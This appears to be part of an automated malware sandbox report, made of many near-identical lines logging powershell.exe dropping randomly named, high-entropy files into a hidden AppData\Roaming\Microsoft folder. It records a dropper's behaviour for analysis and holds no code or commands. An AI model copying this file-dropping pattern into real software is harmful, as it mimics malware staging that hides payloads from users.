Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bBhYEFwTiuvrQSo.vBEypAPMjsVuhr entropy: 7.99812832671	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yQPsbzFBYLpKT.zpAPCfgXVvdoSBHsQh entropy: 7.99676807719	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JKlMmdFUDczjIRhrHby.LWQupcxMHhdzg entropy: 7.99901959144	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\VjDHmaYIwZAkeTE.nwmHCeWEhDrfApjo entropy: 7.99749160795	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LOWIElhkoPRQfmAXSgG.wyhJvlLtVmYd entropy: 7.99811019662	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YWbZvlsKnQLhXGx.YCNXjAMFwz entropy: 7.99809587274	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gLsQqFDuUmpIB.gMEwuYHqyK entropy: 7.99833912451	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GUpRrSFZcisbBWznkdu.IFZtJmwepaRiVWkd entropy: 7.9979111145	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gieIKJHGxaQUfS.UCmQtPkNovXKhRuFE entropy: 7.99894804758	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gSlBXKUxkTz.EtlBijxzXpaIfJCW entropy: 7.99742078136	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uFtLjdoqMkJR.VkKnruWejxJRAwiQGP entropy: 7.99906550215	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\kJYpPZbEgMmrKwLfGqy.GHRbMxSXcsZ entropy: 7.99824719975	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\qIXwcOsVyj.jOtChBHvxi entropy: 7.99852692517	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pNxAuzKlPSsb.YawgmDuzNJcKdqPyBL entropy: 7.99786636258	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\aeRSxfzcUJZPwo.ndPvakbgHREXmyJfG entropy: 7.99892923754	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eSuhvixzbmtJHA.whLFRSsDbelv entropy: 7.99874801806	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pYVhZibRAN.sMvDmAGFcSlhzqQ entropy: 7.99873839924	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BoqCbDpQKO.bvFPZaXthUNlE entropy: 7.99802886509	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xjNZLIaSKwTUqhG.RxpEamVHdP entropy: 7.99797199028	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\FSYovnhrjyl.DQAXqTlMYtPeSoK entropy: 7.99864520825	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ilxHIATvwRVPbNLMF.OIwScazYBQxeDsUiyTR entropy: 7.99869960054	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ELdkTfxCFDn.eNksCconqOSiPDb entropy: 7.99785625608	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SMURdTxctPayFw.JuYBpTvVhGcmbwDRysF entropy: 7.99765003531	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\kMEDQeTsWHq.yQUcMHKWXqPVp entropy: 7.99889568266	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\UWOaDZcofuM.GROcgQwvjeE entropy: 7.9980710531	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hfYTmkujvtb.RqiwAYcPtGH entropy: 7.99910795447	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bEvPXVmuxYsKzOZj.WMeyIFRmLdcnNOEQqjD entropy: 7.99901897203	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\msEhOVNcAUo.OeULIouqtdrzS entropy: 7.99815018955	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\VYXFZDLkOWPz.lXGszCIeYy entropy: 7.99840828854	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uMkeTdNSEJ.RtxefTSFjVm entropy: 7.99873955326	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NdyljBwDAWTrKuPn.UGVysArHdXtRb entropy: 7.99721728237	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\emQfWYlJbzcuhgEjFS.cMXwLzJBEfxQ entropy: 7.99682445963	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GFYTmwkWPuHOnLziVM.NOWtGmAedFUuixYIrf entropy: 7.99893488869	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KxAeNDkTOji.CzYLenjNughsBSo entropy: 7.99908487527	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\kbNfisFtQgdCMxVRz.NrKQaxeAgHzt entropy: 7.99868763539	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hzOWRqiKCu.YqEcenkQtLVrGjxFyZJ entropy: 7.99660539639	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\dExVgJtZmFM.dVgUHwiGMN entropy: 7.99887696239	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\qiDnMGoScBvX.QhuXRaSIftGlyCYmsT entropy: 7.99891161549	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rUwfTjdykcCLzouDaS.GugaDRhMsfYFJwNL entropy: 7.99863201495	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NnZeYtubScVM.OCGyBpNmtehKsdX entropy: 7.99694113324	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zJNyHIxBsoTUqM.uXPHhqoYFQBmfUaVSv entropy: 7.99838569849	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\fzUIOVmgbEL.PwofMUpmSqygHJOB entropy: 7.99865165393	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bmsVSYANwXhpzUvIMrn.czDnvWbgpuUEPjBCOa entropy: 7.99780742318	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BmPyrAcdqptuwGUWVlo.YJEASlNgXGtkZDF entropy: 7.99856691013	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\mCNinZveuTWGlIf.EzAeDLdrcOyF entropy: 7.99885820668	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\mjhHJXxlRObANM.bhNGOUYsTDMpX entropy: 7.99841468182	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\HQEcnpFgIhOvi.dYeLxgpbsa entropy: 7.99766027007	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nUytuBlvmcqP.vGWzInFprMTQDjXEh entropy: 7.99861876513	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CYcdsREkeDBiQztT.IqgsEQdBuXfoYWGhRt entropy: 7.99872823324	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oYUphfqSePQmvk.TZscjmSIDfXoqh entropy: 7.9990951758	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\TvLXNhIqtcnzymYkgPV.uwFKHPfpQLOJZnM entropy: 7.99817719059	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZyHKjponqDh.wtmhxkAKnVpBrPTe entropy: 7.99890674787	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\foVkTpMJmCj.wpzyQlWaGF entropy: 7.99888813304	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hwoIPieCajyQZ.NovXgDSecmiWzL entropy: 7.99885979212	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wxGMJeSDKgcHEBibO.JrHRDfOPXZyu entropy: 7.99901557906	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\unixoAqgECHNBkaIwr.gzhEKSvPlRWw entropy: 7.99905765289	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yRZbeASQDvzYJqLxUBg.CaBeilsRoFxDQhTGP entropy: 7.99886513157	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JOAFXEBnVvMkoQSxK.zDQFOLdvZgB entropy: 7.99791760724	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\EZyiSDMkevR.SLvcEdPWqsaNVG entropy: 7.99878403164	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hRYbzKvFiqJZeH.UsLJamwqQWZVOceo entropy: 7.99887504429	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pbYRUgCZwzexLB.iEPWMzIhptdSLfZR entropy: 7.99883810483	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\AhgdPpHiMqCJ.ficCsWRYUdbQAq entropy: 7.9990601026	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xZElOnSqDAPLui.mSkRcpYHlhDefib entropy: 7.99849289408	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xizqtGCFdLnoUjXcDfP.OzgZjHydqclmaise entropy: 7.99759486243	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\WHiVogfXbmawrhO.bqVLQhuGSW entropy: 7.99809786374	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SyMJFvukdbI.zDvmLxAPWaZdbjTiuI entropy: 7.9970633735	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CaScxTGDgmFX.WYFiPJoxVmn entropy: 7.99804645867	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sWCqhOzyjm.RtZjPKhvlYIb entropy: 7.99745873579	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\tasXFqpmVGdNK.AuyoIGDFOansVXvYUjh entropy: 7.99786853404	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wyictkJvgZsGe.LOZtdkwUnsh entropy: 7.99763676263	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\FrYfegzuAXjZIJDc.fsjVRUJkrMgimQyha entropy: 7.99896122449	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KuxhdBJSlTcD.blNsUVtzhvOKk entropy: 7.99798513465	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rOIMjvtmUnckFxXKRdi.rJvLTgNKCDF entropy: 7.99779958666	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\MYlHPzfIcubkUSsBFg.rPdQXMVgJaLzvui entropy: 7.99896903621	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hlxJAvcsUmY.wfOgcqMWPNipz entropy: 7.99827575593	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\InZTHsYPpytXG.IShPJpyEsunZHLl entropy: 7.99837198101	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YjiKyOrcJwGk.qxvfbFpwEmY entropy: 7.99779983125	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\fwOzlQMHTNp.GfweUsgaxr entropy: 7.99735891554	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YrjtILOFhSDUuW.xBCzSJloQu entropy: 7.9991259775	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cNZgRVKkPWflQaIX.bGTEjRghUSu entropy: 7.99890489417	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\EbOcDlrPJWN.wOrXQBhKLFY entropy: 7.99869411739	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iqcRNjTLfpZKsbVwm.CURHGaWewKBlYijOxq entropy: 7.99659196376	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LAIEyPstUGzgbY.loDCFgnGXOe entropy: 7.99853519064	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bHwprZxgiaM.ADWxBjgpvreEcJR entropy: 7.99903669426	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OpqocLVAJQMamsnfjz.UAlVyborGd entropy: 7.99765020409	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\UWlquhPEwjdAORp.fVQUiOPAgHMSRy entropy: 7.99881959963	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GHauxSgiWlk.uTSzwoUMjelAJI entropy: 7.99799577729	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xMUoSEmbBOXhdc.zHbsJxBgTkrh entropy: 7.99875302976	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eaimdoOFjhTYkG.ibPkNAtxuSOgHho entropy: 7.99898119824	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ecaqmlNKJoAhznVZSi.aFbASBHvMPjIpxg entropy: 7.99895746001	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CnjqfyQZLrAi.oPjxcwRQLGWazkiS entropy: 7.99882520713	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uWdSVHFMpzwm.dtNfviTErbJSa entropy: 7.99893189814	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wOEFNVJZMLxbzeB.NCmfYcXzrEUavMQjueq entropy: 7.99817206318	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uqKJwNQtfnsELBGIYbo.fVDTQZeXHzlbYP entropy: 7.99902142699	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zwAPanTurp.aJyFLSWvQIHO entropy: 7.99837654748	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\biZCFDSfAyhpWxXPs.eVqzEilaBbrwAnMdUPQ entropy: 7.99879598917	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GpqaKSsWxzgJ.kEMCFUOtbiwjBSa entropy: 7.99864924179	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SDZadhsrOVItpu.dtjMHyWqnIQz entropy: 7.998454304	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nvMkfYadeliTKF.RSNBDVQdTKywZqeFJov entropy: 7.9969202992	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GNHnKBdwxEgLj.miYQpUjgKsXvqberOS entropy: 7.9989184746	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\PMRjaEJsxymrZ.pniMmNjhyCwTPK entropy: 7.99814923394	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KPDshnwVZa.mnKktDqdRgHiLs entropy: 7.9977093351	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\PzKJsTnAycDbqMaXF.JilIzScewvxTaVLEyu entropy: 7.99901879091	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iDzCcMrfxXp.dwDFLMsnlkSWzGejtTC entropy: 7.99811400675	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gRilpxFBjKX.uMmBbGZfQTRFlSx entropy: 7.99861156923	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OJutdhroBswzDZ.ugXtIZJNvTlVCPhc entropy: 7.99851845323	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ncVxMtIObB.PdzGebAKXotQ entropy: 7.99866493275	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZPsmtlOSDBajzYRUMX.tIizPswRDdmHeukF entropy: 7.99864012192	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\dSuqKXtAxrGvUlE.ebvmRkXsMNtyE entropy: 7.99880804971	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BCPwxrMdHT.AWakiLJdNlyVvxznMc entropy: 7.99667844874	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\tKMyJLBVwgSHmxCWloj.beLtROwcrpo entropy: 7.99878893368	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KoyvAufhDFgOX.QzlmLYbriNMySIU entropy: 7.99802138252	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\XIdkORoBQzCct.eMqQRjCVSoshbOi entropy: 7.99904778917	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sACZoIEWXwbMxLhiuz.hxfOedlAVNjnFabGcuB entropy: 7.99613490587	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uBjDPHsrMQq.CRGWtsLbVwXMom entropy: 7.99907634223	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uaZFJhrgiAflPpxs.TASopIFyEb entropy: 7.99911096555	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\isOwmSexfTYEjQvuU.HsWxKvRBXIPMLTShl entropy: 7.99811843819	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\XIjhbfeNYAa.txhPHZFNAQ entropy: 7.99897722225	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\IrCWnTavhdJPg.lcAwsetLShIEYy entropy: 7.99812258071	Jump to dropped file
